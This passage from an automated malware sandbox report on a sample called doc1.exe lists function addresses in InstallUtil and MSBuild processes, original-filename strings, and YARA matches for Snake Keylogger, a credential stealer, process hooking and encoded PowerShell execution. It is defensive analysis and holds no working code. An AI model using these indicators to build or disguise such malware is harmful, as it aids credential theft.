                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_066536D821_2_066536D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665672021_2_06656720
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665BF2021_2_0665BF20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665671321_2_06656713
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_06656FF121_2_06656FF1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_06656FF821_2_06656FF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_06659FA021_2_06659FA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665743F21_2_0665743F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665AC3821_2_0665AC38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_06657CF021_2_06657CF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665048821_2_06650488
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665049821_2_06650498
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665C57021_2_0665C570
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_06650D3921_2_06650D39
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_06657D0021_2_06657D00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665A5F021_2_0665A5F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_066555C021_2_066555C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_066585AB21_2_066585AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_066555B321_2_066555B3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_06655A0821_2_06655A08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665D20A21_2_0665D20A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_06655A1821_2_06655A18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_066562C821_2_066562C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_066562BB21_2_066562BB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665B28121_2_0665B281
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665336021_2_06653360
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_06656B6921_2_06656B69
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_06656B7821_2_06656B78
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665335021_2_06653350
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665CBC021_2_0665CBC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_066543D821_2_066543D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665004021_2_06650040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665284821_2_06652848
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665285821_2_06652858
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665000621_2_06650006
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_066508E121_2_066508E1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_066508F021_2_066508F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665B8D021_2_0665B8D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_066578A821_2_066578A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665789821_2_06657898
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665514021_2_06655140
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665814821_2_06658148
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665815821_2_06658158
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665513321_2_06655133
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_0184DD2422_2_0184DD24
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_013D610826_2_013D6108
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_013DC19026_2_013DC190
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_013DB32826_2_013DB328
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_013DE43126_2_013DE431
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_013DC47026_2_013DC470
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_013DF77826_2_013DF778
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_013DC75226_2_013DC752
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_013D985826_2_013D9858
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_013D688026_2_013D6880
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_013DBBB826_2_013DBBB8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_013DCA3226_2_013DCA32
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_013D4AD926_2_013D4AD9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_013DBEB026_2_013DBEB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_013D357226_2_013D3572
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_013DB4F226_2_013DB4F2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_013DD7F026_2_013DD7F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_013DD7E026_2_013DD7E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_06887E7826_2_06887E78
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068877A826_2_068877A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_06880D6026_2_06880D60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688328826_2_06883288
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688DA7026_2_0688DA70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688DEB826_2_0688DEB8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688DEC826_2_0688DEC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688AEEF26_2_0688AEEF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688D60926_2_0688D609
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_06886E0026_2_06886E00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688D61826_2_0688D618
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_06887E3726_2_06887E37
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688B7A026_2_0688B7A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688B7B026_2_0688B7B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688AF0026_2_0688AF00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688E76826_2_0688E768
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688E77826_2_0688E778
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688F48026_2_0688F480
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688049126_2_06880491
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068804A026_2_068804A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688C4B826_2_0688C4B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688BC0826_2_0688BC08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688F47126_2_0688F471
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688CD5826_2_0688CD58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_06880D5026_2_06880D50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688CD6826_2_0688CD68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688DA6326_2_0688DA63
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688327826_2_06883278
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688EBC126_2_0688EBC1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688EBD026_2_0688EBD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688BBF826_2_0688BBF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688E31026_2_0688E310
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688E32026_2_0688E320
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688B34826_2_0688B348
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688B35826_2_0688B358
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688F8C926_2_0688F8C9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688F8D826_2_0688F8D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068808F026_2_068808F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688000726_2_06880007
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688F01826_2_0688F018
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688F02826_2_0688F028
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688004026_2_06880040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688C05026_2_0688C050
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688C06026_2_0688C060
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688D1B026_2_0688D1B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688D1C026_2_0688D1C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688090026_2_06880900
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688C90326_2_0688C903
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688C91026_2_0688C910
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068BA60026_2_068BA600
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B9FB026_2_068B9FB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068BBF3026_2_068BBF30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068BAC4826_2_068BAC48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068BC58026_2_068BC580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B85B026_2_068B85B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B0D4826_2_068B0D48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068BB29026_2_068BB290
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068BD21826_2_068BD218
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068BCBD026_2_068BCBD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B8BF926_2_068B8BF9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068BB8E026_2_068BB8E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B36D826_2_068B36D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B5E6026_2_068B5E60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B5E7026_2_068B5E70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B9FA026_2_068B9FA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B6FF826_2_068B6FF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B6FF126_2_068B6FF1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B671326_2_068B6713
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B672026_2_068B6720
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068BBF2026_2_068BBF20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B048826_2_068B0488
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B049826_2_068B0498
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B7CF026_2_068B7CF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B743F26_2_068B743F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068BAC3726_2_068BAC37
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B745026_2_068B7450
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B85AB26_2_068B85AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B55B326_2_068B55B3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B55C026_2_068B55C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068BA5F026_2_068BA5F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B7D0026_2_068B7D00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B0D3926_2_068B0D39
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068BB28126_2_068BB281
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B62BB26_2_068B62BB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B62C826_2_068B62C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068BD20B26_2_068BD20B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B5A0826_2_068B5A08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B5A1826_2_068B5A18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068BCBC026_2_068BCBC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B43D826_2_068B43D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B335026_2_068B3350
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B6B6926_2_068B6B69
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B336026_2_068B3360
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B6B7826_2_068B6B78
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B789826_2_068B7898
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B78A826_2_068B78A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068BB8D026_2_068BB8D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B08E126_2_068B08E1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B08F026_2_068B08F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B000626_2_068B0006
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B284826_2_068B2848
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B004026_2_068B0040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B285826_2_068B2858
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B513326_2_068B5133
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B814826_2_068B8148
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B514026_2_068B5140
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068B815826_2_068B8158
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 29_2_0271256029_2_02712560
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 29_2_0271DD2429_2_0271DD24
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 35_2_0127DD2435_2_0127DD24
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 35_2_051B000635_2_051B0006
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 35_2_051B004035_2_051B0040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 41_2_0130DD2441_2_0130DD24
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 1064
                  Source: doc1.exeStatic PE information: invalid certificate
                  Source: doc1.exe, 00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs doc1.exe
                  Source: doc1.exe, 00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs doc1.exe
                  Source: doc1.exe, 00000001.00000002.2293545434.0000000002BB8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs doc1.exe
                  Source: doc1.exe, 00000001.00000002.2301644426.0000000003A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs doc1.exe
                  Source: doc1.exe, 00000001.00000002.2293545434.0000000002A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs doc1.exe
                  Source: doc1.exe, 00000001.00000002.2292811799.0000000000E2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs doc1.exe
                  Source: doc1.exe, 00000001.00000002.2293545434.0000000002C34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs doc1.exe
                  Source: doc1.exe, 00000001.00000002.2304587014.00000000058C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs doc1.exe
                  Source: doc1.exe, 00000001.00000002.2302983125.0000000005230000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameUlsahqrq.dll" vs doc1.exe
                  Source: doc1.exe, 00000001.00000002.2301644426.0000000003ACD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs doc1.exe
                  Source: doc1.exe, 00000001.00000002.2304053557.0000000005770000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs doc1.exe
                  Source: doc1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: amsi64_3508.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: amsi64_2188.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: amsi64_6756.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: amsi64_2548.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: amsi64_2744.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: amsi64_4568.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: 1.2.doc1.exe.3c2d068.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.doc1.exe.3c2d068.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.doc1.exe.3c2d068.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 1.2.doc1.exe.3c2d068.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 11.2.bosotkm.exe.417bdd0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 11.2.bosotkm.exe.417bdd0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 11.2.bosotkm.exe.417bdd0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 11.2.bosotkm.exe.417bdd0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 1.2.doc1.exe.3c2d068.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
